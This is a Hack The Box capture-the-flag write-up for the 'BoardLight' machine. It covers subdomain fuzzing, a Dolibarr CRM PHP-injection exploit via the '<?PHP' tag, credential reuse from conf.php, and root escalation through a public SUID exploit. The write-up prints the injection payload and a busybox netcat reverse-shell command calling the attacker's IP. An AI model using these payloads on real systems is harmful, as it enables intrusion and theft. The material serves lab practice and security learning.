> For the complete documentation index, see [llms.txt](https://0xb0b.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xb0b.gitbook.io/writeups/hackthebox/2024/boardlight.md).

# BoardLight

{% embed url="<https://app.hackthebox.com/machines/BoardLight>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Summary

In this challenge, we exploited a vulnerability in Dolibarr CRM (version 17.0.0), allowing us to execute PHP code via an unsanitized input in the websites module. After gaining access as `www-data`, we discovered credentials in the `conf.php` file and reused them to log in as `larissa` via SSH. Further enumeration revealed custom SUID binaries, which we exploited to escalate privileges to root and retrieve the final flag.

## Recon

We start with an Nmap scan and find only two open ports. We have SSH available on port `22` and an Apache web server is running on port `80`.

<figure><img src="/files/1vMzjejdTKJAXK9KF1yQ" alt=""><figcaption></figcaption></figure>

When visiting the end point, we only find a static page.

<figure><img src="/files/dL3W8yCwQvHGKWebOZOX" alt=""><figcaption></figcaption></figure>

Our directory scan with Feroxbuster also seems to confirm this. However, we also see that this is a PHP server.

<figure><img src="/files/Xjhw5D4EJWALiD0DdqLj" alt=""><figcaption></figcaption></figure>

But we still find something useful on the static page. In the 'About Shop' section, we find an info mail that reveals a domain. We add this to our `/etc/hosts`.

<figure><img src="/files/PMhvM1yZIY9ZeWU468sP" alt=""><figcaption></figcaption></figure>

With a sub domain scan using FFuF  we find the subdomain `crm`.

{% code overflow="wrap" %}

```
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://board.htb/ -H "Host:FUZZ.board.htb" -fw 6243
```

{% endcode %}

<figure><img src="/files/vdjjT2vXOhVKvTW0WLFA" alt=""><figcaption></figcaption></figure>

Dolibarr is an open-source ERP (Enterprise Resource Planning) and CRM (Customer Relationship Management) software designed to help businesses manage various operations like sales, inventory, and accounting. In version `17.0.0`.

<figure><img src="/files/JvOIAu9sFxwHuK4WjMTl" alt=""><figcaption></figcaption></figure>

## Shell As www-data

We try to log in with default credentials and are successful.

<figure><img src="/files/EoklXb4OFOalIvNZCLSP" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/cFRfoc6GluD554MZaxLM" alt=""><figcaption></figcaption></figure>

We also find a suitable exploit for version 17.0.1 that allows us to execute remote code.

{% embed url="<https://github.com/advisories/GHSA-9wqr-5jp4-mjmh>" %}

> Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: \<?PHP instead of \<?php in injected data.

{% embed url="<https://starlabs.sg/advisories/23/23-4197/>" %}

> ### Vulnerability Summary:
>
> Users can be granted privileges to add and modify pages in the websites module. Even though there are security settings to only allow HTML/JavaScript/CSS, this can be subverted. Existing checks being to detect PHP content from user-supplied input are insufficient as it only checks for `<?php` and `<?=`, allowing usage of the `<?` short tag for executing PHP code. As a result, an adversary is able to inject unsanitized PHP content into these web pages and achieve code execution via PHP

To exploit this vulnerability, we create a website as shown below.

<figure><img src="/files/wmr5hqM1RyNdeYcJndJk" alt=""><figcaption></figcaption></figure>

We are adding a new page to this:

<figure><img src="/files/9BdqwAmaiqSypuU9u1TR" alt=""><figcaption></figcaption></figure>

We then have to define a title and a page namealias.

<figure><img src="/files/yhmzfEGGdFyUerAUzDRw" alt=""><figcaption></figcaption></figure>

After we have created the page, we edit the source using '`Edit HTML Source`'.

<figure><img src="/files/6uhHXu7YePqM9DutfctA" alt=""><figcaption></figcaption></figure>

To verify that we are successful with the exploit, we first use a simple command to check whether we are successful.

```
<!-- Enter here your HTML content. Add a section with an id tag and tag contenteditable="true" if you want to use the inline editor for the content  -->
<section id="mysection1" contenteditable="true">
<?PHP echo system("whoami"); ?>
</section>
```

<figure><img src="/files/8B7bGbJ6VxT5txlvNWLP" alt=""><figcaption></figcaption></figure>

By clicking on the binoculars we are redirected to our created page.

<figure><img src="/files/12V5oekCdqRe5hU1FIEM" alt=""><figcaption></figcaption></figure>

&#x20;We that the command got succesfully executed.

<figure><img src="/files/NUS6o383PSwVZhQuqu0J" alt=""><figcaption></figcaption></figure>

Next, we set up a listener.

<figure><img src="/files/p5j72iYcTdopjeUaoIcv" alt=""><figcaption></figcaption></figure>

And prepare a payload for a reverse shell using `busybox`.

```
<!-- Enter here your HTML content. Add a section with an id tag and tag contenteditable="true" if you want to use the inline editor for the content  -->
<section id="mysection1" contenteditable="true">
<?PHP echo system("busybox nc 10.10.14.54 80 -e /bin/bash"); ?>
</section>
```

<figure><img src="/files/Y4XVa65wAHdwCnIgEwV9" alt=""><figcaption></figcaption></figure>

After previewing the page we get a connection back. We are `www-data`.

<figure><img src="/files/0ruhudSk0uRBfml3Vr5w" alt=""><figcaption></figcaption></figure>

## Shell as larissa

When enumerating as `www-data`, we see that the board page belongs to larissa. Maybe we can find useful credentials in one of the config files.

<figure><img src="/files/LJfspSF5DFmeZXaGARCg" alt=""><figcaption></figcaption></figure>

We search for the config file conf.php and find it in `/var/www/html/crm.board.htb/htdocs/conf/conf.php`.

```
find / -type f -name "conf.php" 2>/dev/null
```

<figure><img src="/files/KB7q7dviQPuqtWnohJRy" alt=""><figcaption></figcaption></figure>

In this we find the credentials for the database user.

<figure><img src="/files/g7HOplFobqm5PDXgjLwm" alt=""><figcaption></figcaption></figure>

Fortunately, at least in our case, the credentials were reused. With this password, which we found in `conf.php`, we can gain access to the machine as `larissa` via ssh. In the home directory of `larsissa` we find the first flag.

<figure><img src="/files/YehvuMCVnIYU0oZM5lHx" alt=""><figcaption></figcaption></figure>

## Shell as root

When enumerating with `larsissa`, the suid binaries stand out. They match the name of the box. These are not the usual binaries found in GTFObins. But they may have vulnerabilities to get a `root` shell using them.

<figure><img src="/files/mHZEkQAYIu0XVKepL2tL" alt=""><figcaption></figcaption></figure>

We are able to locate the following exploits of which the latter one actually works.

{% embed url="<https://www.exploit-db.com/exploits/51180>" %}

{% embed url="<https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit>" %}

We clone the repository and setup a Python web server to provide the files, alternatively we could have used `scp`.

<figure><img src="/files/NnSDWy2xZUYaOeVcNvvT" alt=""><figcaption></figcaption></figure>

Next, we just need to download the exploit, change the permission of the script to make it executable and execute it. We are `root` and find the last flag at `/root/root.txt`.

<figure><img src="/files/jpUP7ViBcGxi3JGVUM44" alt=""><figcaption></figcaption></figure>
